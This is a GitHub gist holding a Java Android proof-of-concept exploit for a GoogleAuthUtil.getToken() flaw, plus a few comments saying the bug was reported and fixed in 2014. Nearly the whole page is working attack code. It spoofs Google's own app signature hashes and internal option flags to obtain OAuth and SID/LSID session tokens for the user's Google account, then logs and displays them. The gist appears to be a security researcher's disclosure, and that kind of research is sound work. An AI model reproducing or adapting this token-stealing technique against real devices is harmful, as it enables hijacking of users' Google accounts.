Last active
May 12, 2024 23:45
-
-
Save isciurus/df4d7edd9c3efb4a0753 to your computer and use it in GitHub Desktop.
PoC for Android GoogleAuthUtil.getToken() bug
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.isciurus.oauth_poc; | |
import java.io.IOException; | |
import java.text.DateFormat; | |
import java.util.Date; | |
import com.google.android.gms.auth.GoogleAuthException; | |
import com.google.android.gms.auth.GoogleAuthUtil; | |
import com.google.android.gms.auth.UserRecoverableAuthException; | |
import android.accounts.AccountManager; | |
import android.app.Activity; | |
import android.content.Intent; | |
import android.os.AsyncTask; | |
import android.os.Bundle; | |
import android.util.Log; | |
import android.widget.TextView; | |
public class MainActivity extends Activity { | |
public static String _log_str = null; | |
public static OAuthPoCtask task; | |
public String accountName = ""; | |
@Override | |
protected void onActivityResult(int requestCode, int resultCode, Intent data) { | |
if (resultCode == RESULT_OK) { | |
accountName = data.getStringExtra(AccountManager.KEY_ACCOUNT_NAME); | |
Log.d("isciurus", "got primary account: " + accountName); | |
task = new OAuthPoCtask(); | |
task.execute(this); | |
} | |
} | |
private class LeakEmail extends AsyncTask<MainActivity, String, String> { | |
@Override | |
protected String doInBackground(MainActivity... mContext) { | |
Log.d("isciurus", "getting primary account"); | |
Intent aci = AccountManager.newChooseAccountIntent(null, null, | |
new String[]{"com.google"}, false, null, null, null, null); | |
startActivityForResult(aci, 0); | |
return null; | |
} | |
} | |
private class OAuthPoCtask extends AsyncTask<MainActivity, String, String> { | |
protected String doInBackground(MainActivity... mContext) { | |
String service = "SID"; | |
String service2 = "LSID"; | |
Bundle bdl = new Bundle(); | |
bdl.putString("_opt_has_permission", "1"); | |
bdl.putString("_opt_add_account", "1"); | |
bdl.putString("_opt_system_partition", "1"); | |
bdl.putString("_opt_client_sig", "58e1c4133f7441ec3d2c270270a14802da47ba0e"); | |
bdl.putString("_opt_app", "com.google.android.gms"); | |
String token0 = "", token01 = "", token1 = "", token2 = ""; | |
try { | |
Log.d("isciurus", "[test 1]"); | |
token0 = GoogleAuthUtil.getToken(mContext[0], accountName, | |
"oauth2:https://www.googleapis.com/auth/plus.login", bdl); | |
} catch (UserRecoverableAuthException e) { | |
Log.d("isciurus", "getting token failed, replacing the signature"); | |
bdl.remove("_opt_client_sig"); | |
bdl.putString("_opt_client_sig", "38918a453d07199354f8b19af05ec6562ced5788"); | |
try { | |
token0 = GoogleAuthUtil.getToken(mContext[0], accountName, | |
"oauth2:https://www.googleapis.com/auth/plus.login", bdl); | |
} catch (UserRecoverableAuthException e1) { | |
e1.printStackTrace(); | |
} catch (IOException e1) { | |
e1.printStackTrace(); | |
} catch (GoogleAuthException e1) { | |
e1.printStackTrace(); | |
} | |
} catch (GoogleAuthException e) { | |
e.printStackTrace(); | |
} | |
catch (IOException e) { | |
e.printStackTrace(); | |
} | |
if(token0 == "") | |
Log.d("isciurus", "[test 1] failed"); | |
else | |
Log.d("isciurus", "[test 1] ok"); | |
try { | |
Log.d("isciurus", "[test 2]"); | |
token1 = GoogleAuthUtil.getToken(mContext[0], accountName, service, bdl); | |
} catch (UserRecoverableAuthException e) { | |
e.printStackTrace(); | |
} catch (GoogleAuthException e) { | |
e.printStackTrace(); | |
} catch (IOException e) { | |
e.printStackTrace(); | |
} | |
try { | |
token2 = GoogleAuthUtil.getToken(mContext[0], accountName, service2, bdl); | |
} catch (UserRecoverableAuthException e) { | |
e.printStackTrace(); | |
} catch (GoogleAuthException e) { | |
e.printStackTrace(); | |
} | |
catch (IOException e) { | |
e.printStackTrace(); | |
} | |
if(token1 == "" || token2 == "") | |
Log.d("isciurus", "[test 2] fail"); | |
else | |
Log.d("isciurus", "[test 2] ok"); | |
_log_str = "token0=" + token0 + "\r\ntoken01=" + token01 + "\r\n" + | |
"SID=" + token1 + "\r\nLSID=" + token2; | |
Log.d("isciurus", _log_str); | |
runOnUiThread(new Runnable() { | |
@Override | |
public void run() { | |
TextView t=(TextView) findViewById(R.id.text1); | |
t.setText(MainActivity._log_str); | |
} | |
}); | |
return ""; | |
} | |
} | |
@SuppressWarnings("deprecation") | |
@Override | |
protected void onCreate(Bundle savedInstanceState) { | |
super.onCreate(savedInstanceState); | |
setContentView(R.layout.activity_main); | |
TextView t=(TextView) findViewById(R.id.text1); | |
t.setText("loading"); | |
String currentDateTimeString = DateFormat.getDateTimeInstance().format(new Date()); | |
Log.d("isciurus", currentDateTimeString); | |
LeakEmail leak_fn = new LeakEmail(); | |
leak_fn.execute(this); | |
} | |
} |
2 myanimal:
You can try reproducing on older (before December 2, 2014) versions of Google Play before I reported it. I don't know how to downgrade, but I have an apk from that time.
Thanks @isciurus, I can confirm this is reproducible on Play Services 6.1.11 (~ 3 October 2104). Looks like it's fixed in both the 6.1 and 6.5 branches. Good job and thanks for reporting it!
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You could add the link of the article as a comment inside of the gist :-)
And good job!